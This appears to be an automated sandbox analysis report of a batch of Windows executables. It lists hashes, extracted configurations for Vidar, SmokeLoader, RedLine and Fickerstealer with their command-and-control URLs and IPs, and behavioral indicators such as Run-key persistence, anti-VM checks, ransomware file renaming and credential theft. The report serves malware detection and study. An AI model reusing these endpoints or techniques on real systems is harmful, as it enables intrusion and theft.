Overview
overview
10Static
static
8 (1).exe
windows10_x64
108 (10).exe
windows10_x64
108 (11).exe
windows10_x64
108 (12).exe
windows10_x64
108 (13).exe
windows10_x64
108 (14).exe
windows10_x64
8 (15).exe
windows10_x64
108 (16).exe
windows10_x64
108 (17).exe
windows10_x64
108 (18).exe
windows10_x64
108 (19).exe
windows10_x64
108 (2).exe
windows10_x64
108 (20).exe
windows10_x64
108 (21).exe
windows10_x64
108 (22).exe
windows10_x64
108 (23).exe
windows10_x64
108 (24).exe
windows10_x64
108 (25).exe
windows10_x64
108 (26).exe
windows10_x64
108 (27).exe
windows10_x64
108 (28).exe
windows10_x64
108 (29).exe
windows10_x64
108 (3).exe
windows10_x64
108 (30).exe
windows10_x64
108 (31).exe
windows10_x64
108 (4).exe
windows10_x64
108 (5).exe
windows10_x64
108 (6).exe
windows10_x64
108 (7).exe
windows10_x64
108 (8).exe
windows10_x64
108 (9).exe
windows10_x64
108.exe
windows10_x64
10Resubmissions
13-08-2021 10:16
210813-wpta271jdx 1008-08-2021 23:00
210808-fgs5g9pxfs 1007-08-2021 23:12
210807-g2jw1lmd4a 1007-08-2021 16:10
210807-51nhct4kfx 1006-08-2021 23:43
210806-gc2271nxwj 1006-08-2021 06:00
210806-f443x39x8a 1005-08-2021 17:08
210805-97y6banvvx 1004-08-2021 17:25
210804-hkxx2ntr8x 1004-08-2021 12:12
210804-rjbg4b4y7n 1003-08-2021 17:12
210803-r2h7ytjwqj 10Analysis
-
max time kernel
1801s -
max time network
1817s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
20-07-2021 22:46
Static task
static1
Behavioral task
behavioral1
Sample
8 (1).exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
8 (10).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
8 (11).exe
Resource
win10v20210410
Behavioral task
behavioral4
Sample
8 (12).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
8 (13).exe
Resource
win10v20210410
Behavioral task
behavioral6
Sample
8 (14).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
8 (15).exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
8 (16).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
8 (17).exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
8 (18).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
8 (19).exe
Resource
win10v20210408
Behavioral task
behavioral12
Sample
8 (2).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
8 (20).exe
Resource
win10v20210408
Behavioral task
behavioral14
Sample
8 (21).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
8 (22).exe
Resource
win10v20210410
Behavioral task
behavioral16
Sample
8 (23).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
8 (24).exe
Resource
win10v20210410
Behavioral task
behavioral18
Sample
8 (25).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
8 (26).exe
Resource
win10v20210410
Behavioral task
behavioral20
Sample
8 (27).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
8 (28).exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
8 (29).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
8 (3).exe
Resource
win10v20210408
Behavioral task
behavioral24
Sample
8 (30).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
8 (31).exe
Resource
win10v20210408
Behavioral task
behavioral26
Sample
8 (4).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
8 (5).exe
Resource
win10v20210408
Behavioral task
behavioral28
Sample
8 (6).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
8 (7).exe
Resource
win10v20210410
Behavioral task
behavioral30
Sample
8 (8).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
8 (9).exe
Resource
win10v20210410
Behavioral task
behavioral32
Sample
8.exe
Resource
win10v20210408
General
-
Target
8 (24).exe
-
Size
3.0MB
-
MD5
bb072cad921aa5ce8b97706ce01bc570
-
SHA1
18bf034906c1341b7817e7361ad27a4425d820bd
-
SHA256
817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97
-
SHA512
d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474
Malware Config
Extracted
C:\_readme.txt
https://we.tl/t-N3p42CffoV
Extracted
vidar
39.6
933
https://sslamlssa1.tumblr.com/
-
profile_id
933
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
AniNEW
akedauiver.xyz:80
Extracted
redline
sel17
dwarimlari.xyz:80
Extracted
fickerstealer
37.0.8.225:80
Extracted
vidar
39.7
865
https://shpak125.tumblr.com/
-
profile_id
865
Signatures
-
Fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3872 3584 rUNdlL32.eXe 6 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3336 4092 rUNdlL32.eXe 151 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral17/memory/5084-282-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral17/memory/5084-287-0x0000000000417E1A-mapping.dmp family_redline behavioral17/memory/5084-337-0x0000000004FB0000-0x00000000055B6000-memory.dmp family_redline behavioral17/memory/3844-360-0x0000000000417DEA-mapping.dmp family_redline behavioral17/memory/3844-359-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral17/memory/4564-369-0x0000000000417DFA-mapping.dmp family_redline behavioral17/memory/2364-411-0x0000000000417DEE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 4628 created 3936 4628 WerFault.exe 86 PID 5580 created 4616 5580 WerFault.exe 105 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 6288 created 4028 6288 svchost.exe 116 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
resource yara_rule behavioral17/memory/3936-182-0x0000000000BC0000-0x0000000000C5D000-memory.dmp family_vidar behavioral17/memory/3936-185-0x0000000000400000-0x00000000008F2000-memory.dmp family_vidar behavioral17/memory/3176-406-0x0000000000400000-0x00000000008EC000-memory.dmp family_vidar -
resource yara_rule behavioral17/files/0x000100000001ab5a-118.dat aspack_v212_v242 behavioral17/files/0x000100000001ab5a-119.dat aspack_v212_v242 behavioral17/files/0x000100000001ab56-122.dat aspack_v212_v242 behavioral17/files/0x000100000001ab55-123.dat aspack_v212_v242 behavioral17/files/0x000100000001ab56-124.dat aspack_v212_v242 behavioral17/files/0x000100000001ab58-127.dat aspack_v212_v242 behavioral17/files/0x000100000001ab58-128.dat aspack_v212_v242 behavioral17/files/0x000100000001ab55-129.dat aspack_v212_v242 behavioral17/files/0x000100000001ab55-130.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 3768 setup_installer.exe 3672 setup_install.exe 1368 sonia_5.exe 3860 sonia_1.exe 3936 sonia_3.exe 2780 sonia_2.exe 3764 sonia_6.exe 744 sonia_4.exe 3960 sonia_1.exe 1684 jfiag3g_gg.exe 2792 9Pa8PMMPkyf8SGBEH1uYdCbf.exe 4388 jhuuee.exe 4452 OLKbrowser.exe 4532 setup 326.exe 4616 setup.exe 4832 zhangd.exe 4900 winnetdriv.exe 4968 Chrome Update.exe 5092 jfiag3g_gg.exe 4312 kqeXdAGpVcGgLywxk0BYvmVm.exe 476 lpAfni_7QD4LldXItFftZMwH.exe 4220 mkWPGHM5ESymd929goGa08Ba.exe 4740 WerFault.exe 5084 OLKbrowser.exe 1784 vF_tRUFDrgq74_eZghnvLSlC.exe 4808 8tjwwIyonm6su2Zy3Fvr6IzA.exe 4028 mcXQQ_4vhghRXKoYPq8IHK8j.exe 4004 bR4zx8dIQOSG_1iSecN3jGoa.exe 4848 jfiag3g_gg.exe 4852 7LaZKmUgP8g73aYi9Gpt9XlK.exe 2792 9Pa8PMMPkyf8SGBEH1uYdCbf.exe 3920 UsXq9y7lp4UClEwrvv1VdVIo.exe 2820 9Lc433knRgQyJPxTFybI08ZB.exe 4252 pd4dwmMKZbvyz6uc8YnXiR2U.exe 4984 eBJ20yyL2mz8qCfJRissL3jN.exe 4932 5zYw5SgG32PobG9d_DhAst0D.exe 4416 uHTznje98_0UVXX4DZ_JIH6K.exe 2444 F3OFPDUCFW5c4q2cE6HvnDLg.exe 3176 TmeGKKVV0BFAyWaPlhdBl8TE.exe 2804 zhangd.exe 4236 jfiag3g_gg.exe 5064 Conhost.exe 3844 mkWPGHM5ESymd929goGa08Ba.exe 4564 8tjwwIyonm6su2Zy3Fvr6IzA.exe 3024 bR4zx8dIQOSG_1iSecN3jGoa.exe 4736 Updater.exe 4508 9Pa8PMMPkyf8SGBEH1uYdCbf.exe 4548 F3OFPDUCFW5c4q2cE6HvnDLg.exe 2364 bR4zx8dIQOSG_1iSecN3jGoa.exe 5508 11111.exe 5572 11111.exe 5320 8374.exe 5232 Sensitive.exe.com 5408 Acre.exe.com 5144 1234.exe 5712 Sensitive.exe.com 5804 Acre.exe.com 6000 8EA1.exe 6044 22222.exe 5476 Sensitive.exe.com 1316 Acre.exe.com 5296 Sensitive.exe.com 5460 8374.exe 5308 Acre.exe.com -
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ConvertConnect.tiff => C:\Users\Admin\Pictures\ConvertConnect.tiff.moqs 8374.exe File renamed C:\Users\Admin\Pictures\FormatRemove.png => C:\Users\Admin\Pictures\FormatRemove.png.moqs 8374.exe File opened for modification C:\Users\Admin\Pictures\ConvertConnect.tiff 8374.exe -
resource yara_rule behavioral17/files/0x000100000001ab5d-171.dat upx behavioral17/files/0x000100000001ab5d-170.dat upx behavioral17/files/0x000100000001ab6e-273.dat upx -
resource yara_rule behavioral17/memory/4416-325-0x0000000000400000-0x000000000064F000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5zYw5SgG32PobG9d_DhAst0D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5zYw5SgG32PobG9d_DhAst0D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UsXq9y7lp4UClEwrvv1VdVIo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UsXq9y7lp4UClEwrvv1VdVIo.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation sonia_5.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eRntMwARsh.url Acre.exe.com File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QkqVJFpwBk.url Sensitive.exe.com -
Loads dropped DLL 15 IoCs
pid Process 3672 setup_install.exe 3672 setup_install.exe 3672 setup_install.exe 3672 setup_install.exe 3672 setup_install.exe 3672 setup_install.exe 1124 rundll32.exe 2780 sonia_2.exe 3448 rundll32.exe 3176 TmeGKKVV0BFAyWaPlhdBl8TE.exe 3176 TmeGKKVV0BFAyWaPlhdBl8TE.exe 6000 8EA1.exe 6000 8EA1.exe 6684 build2.exe 6684 build2.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4712 icacls.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral17/memory/3920-346-0x0000000000A50000-0x0000000000A51000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" sonia_6.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\bc419848-d722-4661-9b4e-d634a23bf423\\8374.exe\" --AutoStart" 8374.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run A314.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\A314.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\A314.exe" A314.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UsXq9y7lp4UClEwrvv1VdVIo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA uHTznje98_0UVXX4DZ_JIH6K.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5zYw5SgG32PobG9d_DhAst0D.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 317 api.2ip.ua 339 api.2ip.ua 16 ip-api.com 149 api.ipify.org 209 api.2ip.ua 318 api.2ip.ua 323 api.2ip.ua 341 api.2ip.ua 356 api.2ip.ua 12 ipinfo.io 208 api.2ip.ua 357 api.2ip.ua 13 ipinfo.io 271 api.2ip.ua -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 1DAC5420CDD46A49 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4932 5zYw5SgG32PobG9d_DhAst0D.exe 3920 UsXq9y7lp4UClEwrvv1VdVIo.exe -
Suspicious use of SetThreadContext 19 IoCs
description pid Process procid_target PID 984 set thread context of 1536 984 svchost.exe 100 PID 4452 set thread context of 5084 4452 OLKbrowser.exe 109 PID 4740 set thread context of 4984 4740 WerFault.exe 126 PID 4220 set thread context of 3844 4220 mkWPGHM5ESymd929goGa08Ba.exe 141 PID 4808 set thread context of 4564 4808 8tjwwIyonm6su2Zy3Fvr6IzA.exe 142 PID 2444 set thread context of 4548 2444 F3OFPDUCFW5c4q2cE6HvnDLg.exe 161 PID 4004 set thread context of 2364 4004 bR4zx8dIQOSG_1iSecN3jGoa.exe 159 PID 5320 set thread context of 5460 5320 8374.exe 203 PID 7104 set thread context of 6336 7104 8374.exe 222 PID 6620 set thread context of 6684 6620 build2.exe 243 PID 5144 set thread context of 6756 5144 1234.exe 244 PID 5752 set thread context of 4408 5752 Sensitive.exe.com 254 PID 5308 set thread context of 3120 5308 Acre.exe.com 256 PID 1784 set thread context of 6620 1784 8374.exe 258 PID 304 set thread context of 2804 304 8374.exe 262 PID 6080 set thread context of 6560 6080 8374.exe 265 PID 5620 set thread context of 2780 5620 8374.exe 267 PID 6716 set thread context of 5940 6716 8374.exe 270 PID 6332 set thread context of 6404 6332 8374.exe 272 -
Drops file in Program Files directory 7 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg lpAfni_7QD4LldXItFftZMwH.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg lpAfni_7QD4LldXItFftZMwH.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat lpAfni_7QD4LldXItFftZMwH.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe lpAfni_7QD4LldXItFftZMwH.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.exe lpAfni_7QD4LldXItFftZMwH.exe File created C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.ini lpAfni_7QD4LldXItFftZMwH.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe lpAfni_7QD4LldXItFftZMwH.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\winnetdriv.exe setup 326.exe File opened for modification C:\Windows\winnetdriv.exe setup 326.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
pid pid_target Process procid_target 4360 4968 WerFault.exe 106 4628 3936 WerFault.exe 86 2004 4616 WerFault.exe 105 4980 4616 WerFault.exe 105 4740 4616 WerFault.exe 105 8 4616 WerFault.exe 105 5260 4616 WerFault.exe 105 5480 4616 WerFault.exe 105 5580 4616 WerFault.exe 105 6752 4028 WerFault.exe 116 7108 5832 WerFault.exe 208 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8EA1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString F3OFPDUCFW5c4q2cE6HvnDLg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TmeGKKVV0BFAyWaPlhdBl8TE.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 F3OFPDUCFW5c4q2cE6HvnDLg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TmeGKKVV0BFAyWaPlhdBl8TE.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8EA1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 6080 timeout.exe 4432 timeout.exe 6976 timeout.exe 6912 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 5524 taskkill.exe 5488 taskkill.exe 6292 taskkill.exe 6868 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs mcXQQ_4vhghRXKoYPq8IHK8j.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mcXQQ_4vhghRXKoYPq8IHK8j.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" 